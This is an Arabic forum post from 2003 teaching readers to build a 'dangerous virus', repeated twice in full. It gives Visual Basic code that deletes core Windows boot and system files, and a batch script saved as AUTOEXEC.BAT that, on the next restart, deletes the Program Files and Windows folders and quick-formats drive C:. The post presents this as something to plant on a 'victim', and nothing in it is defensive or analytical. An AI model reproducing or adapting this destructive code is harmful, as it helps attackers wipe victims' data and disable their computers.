محمـــد
04-30-2003, 08:34 PM
يمكنك صنع فيروس صغير الحجم و خطير ايضا عن طريق الفيجوال بيسك و المفكرة ايضا
--------------------------------------------------------------------------------
أولا: بالفيجوال بيسك
1 ــ قم بإنشاء مشروع جديد واضغط على الفورم Form مرتين لتنتقل لشاشة الكود .
2 ــ اكتب الكود التالي :
Kill "c:\TheSystemFile.any"
وهكذا حيث أن TheSystemFile.any هو ملف النظام المراد حذفه
قم بإظافة أكثر من ملف من الملفات المهمة يعني أهم شيء الشرطات بعد ما تكتب Kill تحط " وبعد ما تنتهي من كتابة مسار الملف تحط "
(مثال عملي) قم بكتابة الكود هذا :
Kill "c:\AUTOEXEC.BAT"
Kill "c:\MSDOS.SYS"
Kill "c:\IO.SYS"
Kill "c:\windows\win.ini"
Kill "c:\windows\system.ini"
Kill "c:\command.com"
Kill "c:\CONFIG.SYS"
Kill "c:\windows\system\SYSTRAY.EXE"
Kill "c:\windows\system\MDM.EXE"
Kill "C:\windows\RUNDLL.EXE"
Kill "c:\windows\RUNDLL32.EXE"
Kill "c:\windows\winstart.bat"
لاحظ أن " قبل كتابت مسار الملف وبعد انتهائه ولكن الكتابة مقلوبة هنا ولكي تقوم بتفادي الأخطاء عليك نسخ الكود ولصقه في الفيجوال بيسك وهذا كل شيء
--------------------------------------------------------------------------------
ثانيا: بالمفكرة (Not Pad)
هذا الفيروس بمجرد ان يضعه الضحيه
في جهازه اويفتحه سيقوم بفرمتة جهازه
وايااااااااكم وفتحه
--------
الطريقه:
اعمل مفكرة جديده فارغة عن طريق اضغط كليك يمين ثم اختر new ثم اختر new text document.txt
ضع هذا الكود في المفكرة واحفظه باسم Autoexec.bat
code:
---------------------------------------------------------------------------------
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
-----------------------------------------------------------------------------------------------
وقد تتسائلون لماذا سمي الملف بهذا الاسم
لانه نفس اسم ملف تشغيل في الويندوز
فعندما يعاد تشغيل الجهاز او اطفاِؤه سيقوم الفيرس بالامر الفورمات
اي انسخ الكود وضعه في المفكرة
--------------------------------------------------------------------------------
أولا: بالفيجوال بيسك
1 ــ قم بإنشاء مشروع جديد واضغط على الفورم Form مرتين لتنتقل لشاشة الكود .
2 ــ اكتب الكود التالي :
Kill "c:\TheSystemFile.any"
وهكذا حيث أن TheSystemFile.any هو ملف النظام المراد حذفه
قم بإظافة أكثر من ملف من الملفات المهمة يعني أهم شيء الشرطات بعد ما تكتب Kill تحط " وبعد ما تنتهي من كتابة مسار الملف تحط "
(مثال عملي) قم بكتابة الكود هذا :
Kill "c:\AUTOEXEC.BAT"
Kill "c:\MSDOS.SYS"
Kill "c:\IO.SYS"
Kill "c:\windows\win.ini"
Kill "c:\windows\system.ini"
Kill "c:\command.com"
Kill "c:\CONFIG.SYS"
Kill "c:\windows\system\SYSTRAY.EXE"
Kill "c:\windows\system\MDM.EXE"
Kill "C:\windows\RUNDLL.EXE"
Kill "c:\windows\RUNDLL32.EXE"
Kill "c:\windows\winstart.bat"
لاحظ أن " قبل كتابت مسار الملف وبعد انتهائه ولكن الكتابة مقلوبة هنا ولكي تقوم بتفادي الأخطاء عليك نسخ الكود ولصقه في الفيجوال بيسك وهذا كل شيء
--------------------------------------------------------------------------------
ثانيا: بالمفكرة (Not Pad)
هذا الفيروس بمجرد ان يضعه الضحيه
في جهازه اويفتحه سيقوم بفرمتة جهازه
وايااااااااكم وفتحه
--------
الطريقه:
اعمل مفكرة جديده فارغة عن طريق اضغط كليك يمين ثم اختر new ثم اختر new text document.txt
ضع هذا الكود في المفكرة واحفظه باسم Autoexec.bat
code:
---------------------------------------------------------------------------------
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
-----------------------------------------------------------------------------------------------
وقد تتسائلون لماذا سمي الملف بهذا الاسم
لانه نفس اسم ملف تشغيل في الويندوز
فعندما يعاد تشغيل الجهاز او اطفاِؤه سيقوم الفيرس بالامر الفورمات
اي انسخ الكود وضعه في المفكرة